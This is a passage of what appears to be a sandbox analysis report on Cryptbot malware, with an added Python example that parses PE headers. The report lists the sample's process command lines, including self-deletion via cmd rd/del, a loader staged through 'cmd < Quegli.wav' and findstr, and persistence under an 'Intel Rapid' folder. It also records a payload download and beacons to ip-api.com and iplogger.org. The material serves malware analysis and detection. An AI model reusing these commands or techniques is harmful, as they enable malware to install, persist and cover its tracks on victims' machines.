00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 f0 16 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d b4 ea 47 00 89 48 04
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtzB8@@@`.textrt `.rdatan+,x@@.data+@.ndata.rsrc@@.reloc@BU\}t+}FEuHGH
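
The body returned for /downfiles/lv.exe (4,520,950 bytes, saved by the sample as File.exe) starts with a 32-bit PE whose section table reads .text, .rdata, .data, .ndata, .rsrc, .reloc; an uninitialized, writable .ndata section is the signature of an NSIS installer stub, and the COFF TimeDateStamp 0x4F47E2E4 is a 2012 date even though the server reports the file as modified on 28 Sep 2021. The following is an added Python example, not part of the Joe Sandbox report, that parses those headers and records the checks an analyst would make. SAMPLE is constructed, not the downloaded file: its DOS header carries only e_lfanew (0xD0), the DOS stub and Rich header region is zero-filled, the optional header is zero-filled apart from the PE32 magic, and the COFF header and the six section headers reproduce the values in the report's Data Raw above.

```python
"""Parse a PE header and triage its section table (added example).
SAMPLE is constructed: only e_lfanew, the COFF header and the six section
headers reproduce the report's Data Raw; everything else is zero-filled."""
import struct
from datetime import datetime, timezone

IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes
COFF_FMT = "<HHIIIHH"         # IMAGE_FILE_HEADER, 20 bytes


def _section(name, vsize, vaddr, rawsize, rawptr, chars):
    return struct.pack(SECTION_FMT, name, vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, chars)


E_LFANEW, OPT_SIZE = 0xD0, 0xE0
SAMPLE = (
    b"MZ" + b"\x00" * 58 + struct.pack("<I", E_LFANEW)    # e_lfanew sits at offset 0x3C
    + b"\x00" * (E_LFANEW - 64)                            # DOS stub / Rich header elided
    + b"PE\x00\x00"
    # i386, 6 sections, TimeDateStamp 0x4F47E2E4, no symbols, opt hdr 0xE0, EXECUTABLE|32BIT
    + struct.pack(COFF_FMT, 0x014C, 6, 0x4F47E2E4, 0, 0, OPT_SIZE, 0x0102)
    + struct.pack("<H", 0x10B) + b"\x00" * (OPT_SIZE - 2)  # PE32 magic, rest zero-filled
    + _section(b".text", 0x728C, 0x1000, 0x7400, 0x400, 0x60000020)
    + _section(b".rdata", 0x2B6E, 0x9000, 0x2C00, 0x7800, 0x40000040)
    + _section(b".data", 0x72B9C, 0xC000, 0x200, 0xA400, 0xC0000040)
    + _section(b".ndata", 0xE1000, 0x7F000, 0, 0, 0xC0000080)
    + _section(b".rsrc", 0xEF18, 0x160000, 0xF000, 0xA600, 0x40000040)
    + _section(b".reloc", 0xFD6, 0x16F000, 0x1000, 0xB800, 0x42000040)
)


def parse_pe(data: bytes) -> dict:
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsect, tstamp, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, coff)
    magic = struct.unpack_from("<H", data, coff + 20)[0]  # first word of the optional header
    off = coff + 20 + opt_size                             # section table follows the optional header
    sections = []
    for _ in range(nsect):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, sc = struct.unpack_from(SECTION_FMT, data, off)
        sections.append({"name": name.rstrip(b"\x00").decode("ascii", "replace"),
                         "vsize": vsize, "vaddr": vaddr, "rawsize": rawsize,
                         "rawptr": rawptr, "characteristics": sc})
        off += struct.calcsize(SECTION_FMT)
    return {"machine": machine, "pe32plus": magic == 0x20B,
            "timestamp": datetime.fromtimestamp(tstamp, tz=timezone.utc),
            "characteristics": chars, "sections": sections}


def triage(info: dict, observed_year: int) -> list:
    """Notes an analyst would record from the header alone."""
    notes = []
    for s in info["sections"]:
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
            notes.append(f"{s['name']}: writable and executable")
        if s["name"] == ".ndata" and c & IMAGE_SCN_CNT_UNINITIALIZED_DATA:
            notes.append(".ndata: NSIS installer stub, payload is in the appended installer data")
        if s["rawsize"] and s["vsize"] > 16 * s["rawsize"]:
            notes.append(f"{s['name']}: virtual size {s['vsize']:#x} far exceeds raw size {s['rawsize']:#x}")
    if info["timestamp"].year < observed_year - 1:
        notes.append(f"link timestamp {info['timestamp']:%Y-%m-%d} predates the download; "
                     "for NSIS it is the prebuilt stub's build date, not the packer's")
    return notes


if __name__ == "__main__":
    pe = parse_pe(SAMPLE)
    for s in pe["sections"]:
        print(f"{s['name']:8} va={s['vaddr']:#08x} vsize={s['vsize']:#08x} raw={s['rawsize']:#08x} chr={s['characteristics']:#010x}")
    for n in triage(pe, 2021):
        print("-", n)
```

The timestamp caveat matters when building a timeline: an NSIS-packed dropper carries the NSIS stub's 2012 link date, so the COFF timestamp says nothing about when this particular payload was built; the server's Last-Modified (three and a half hours before the analysis) is the better indicator here.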


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.7 | 49836 | 208.95.112.1 | 80 | C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
Timestamp | kBytes transferred | Direction | Data
Sep 28, 2021 15:26:15.914666891 CEST | 10458 | OUT | GET /json HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: ip-api.com
                                                                    Connection: Keep-Alive
Sep 28, 2021 15:26:15.946197987 CEST | 10458 | IN | HTTP/1.1 200 OK
                                                                    Date: Tue, 28 Sep 2021 13:26:15 GMT
                                                                    Content-Type: application/json; charset=utf-8
                                                                    Content-Length: 281
                                                                    Access-Control-Allow-Origin: *
                                                                    X-Ttl: 60
                                                                    X-Rl: 44
                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 48 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 22 3a 22 38 31 35 32 22 2c 22 6c 61 74 22 3a 34 37 2e 34 33 2c 22 6c 6f 6e 22 3a 38 2e 35 37 31 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 43 64 6e 37 37 20 5a 55 52 20 49 54 58 22 2c 22 61 73 22 3a 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 38 34 2e 31 37 2e 35 32 2e 33 39 22 7d
                                                                    Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZH","regionName":"Zurich","city":"Zurich","zip":"8152","lat":47.43,"lon":8.5718,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"Cdn77 ZUR ITX","as":"AS60068 Datacamp Limited","query":"84.17.52.39"}


                                                                    HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49849 | 88.99.66.31 | 443 | C:\Windows\SysWOW64\wscript.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-28 13:26:19 UTC | 0 | OUT | GET /1N5Jh7 HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Language: en-us
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                    Host: iplogger.org
                                                                    Connection: Keep-Alive
2021-09-28 13:26:19 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Tue, 28 Sep 2021 13:26:19 GMT
                                                                    Content-Type: image/png
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=jer3i1qcg3tltbsbr27ddfhjc0; path=/; HttpOnly
                                                                    Pragma: no-cache
                                                                    Set-Cookie: clhf03028ja=84.17.52.39; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=246212612; path=/
                                                                    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Cache-Control: no-cache
                                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                    Answers:
                                                                    whoami: 05fcf0cbbe3b0d43d2db2a195dd6e41b94c72f810bf1e1eb0cd5f245ef5b4d6e
                                                                    Strict-Transport-Security: max-age=31536000; preload
                                                                    X-Frame-Options: DENY
2021-09-28 13:26:19 UTC | 1 | IN | Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    System Behavior

                                                                    General

                                                                    Start time:15:23:42
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\Desktop\7yyqdBJVGf.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                                                                    Imagebase:0x400000
                                                                    File size:380416 bytes
                                                                    MD5 hash:267667A4BBFDFCF20C407C2B191FD0ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000002.315679467.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000002.316198160.0000000003080000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Cryptbot, Description: Yara detected Cryptbot, Source: 00000000.00000003.251202902.00000000030D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    General

                                                                    Start time:15:24:13
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\File.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user~1\AppData\Local\Temp\File.exe'
                                                                    Imagebase:0x400000
                                                                    File size:4520950 bytes
                                                                    MD5 hash:303F5DE158A079AAE941319BE50D1F2D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 33%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Start time:15:24:13
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\system32\cmd.exe' /c rd /s /q C:\Users\user~1\AppData\Local\Temp\djUYPUrixI & timeout 4 & del /f /q 'C:\Users\user\Desktop\7yyqdBJVGf.exe'
                                                                    Imagebase:0x870000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:15:24:14
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff774ee0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:15:24:14
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\dislip\wheezy.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\dislip\wheezy.exe
                                                                    Imagebase:0x4e0000
                                                                    File size:916160 bytes
                                                                    MD5 hash:20B1305BCB80B32661D564CE22DF4C24
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 9%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Start time:15:24:14
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:timeout 4
                                                                    Imagebase:0xe60000
                                                                    File size:26112 bytes
                                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:15:24:15
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\dislip\parted.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\dislip\parted.exe
                                                                    Imagebase:0x7ff613610000
                                                                    File size:3570176 bytes
                                                                    MD5 hash:C92045F9553387FE8AB90B2B6A24E805
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 36%, ReversingLabs
                                                                    Reputation:low

                                                                    General

                                                                    Start time:15:24:16
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\dllhost.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:dllhost.exe
                                                                    Imagebase:0xee0000
                                                                    File size:19360 bytes
                                                                    MD5 hash:70E2034A1C3D0ECCB73F57E33D4BFFA0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:17
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd /c cmd < Quegli.wav
                                                                    Imagebase:0x870000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:17
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff774ee0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:19
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:cmd
                                                                    Imagebase:0x870000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:19
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:findstr /V /R '^DUaegCnUMchmsYAygRiDFQbmDzwCKZUZJepHBYJZehdUDKbgCOorIoZNvTmUBVpMAhPfPTEdoiBamDVSWNqWRRdBeclInOnitDzdUonJlSVAHHhSXGYOUhVJWgj$' Bel.wav
                                                                    Imagebase:0x2b0000
                                                                    File size:29696 bytes
                                                                    MD5 hash:8B534A7FC0630DE41BB1F98C882C19EC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:20
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    Wow64 process (32bit):true
                                                                    Commandline:Bisogna.exe.com l
                                                                    Imagebase:0x8b0000
                                                                    File size:893608 bytes
                                                                    MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:20
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Imagebase:0x7ff777f80000
                                                                    File size:3570176 bytes
                                                                    MD5 hash:C92045F9553387FE8AB90B2B6A24E805
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 36%, ReversingLabs

                                                                    General

                                                                    Start time:15:24:20
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:ping 127.0.0.1
                                                                    Imagebase:0x320000
                                                                    File size:18944 bytes
                                                                    MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:21
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Bisogna.exe.com l
                                                                    Imagebase:0x8b0000
                                                                    File size:893608 bytes
                                                                    MD5 hash:C56B5F0201A3B3DE53E561FE76912BFD
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:22
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Imagebase:0x7ff777f80000
                                                                    File size:3570176 bytes
                                                                    MD5 hash:C92045F9553387FE8AB90B2B6A24E805
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:27
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Windows\system32\rundll32.exe' C:\Windows\system32\advpack.dll,DelNodeRunDLL32 'C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\'
                                                                    Imagebase:0x7ff71f5a0000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:24:35
                                                                    Start date:28/09/2021
                                                                    Path:C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Users\user\AppData\Roaming\Intel Rapid\IntelRapid.exe'
                                                                    Imagebase:0x7ff777f80000
                                                                    File size:3570176 bytes
                                                                    MD5 hash:C92045F9553387FE8AB90B2B6A24E805
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    General

                                                                    Start time:15:26:16
                                                                    Start date:28/09/2021
                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user~1\AppData\Local\Temp\lmlpnsexh.vbs'
                                                                    Imagebase:0x1330000
                                                                    File size:147456 bytes
                                                                    MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Disassembly

                                                                    Code Analysis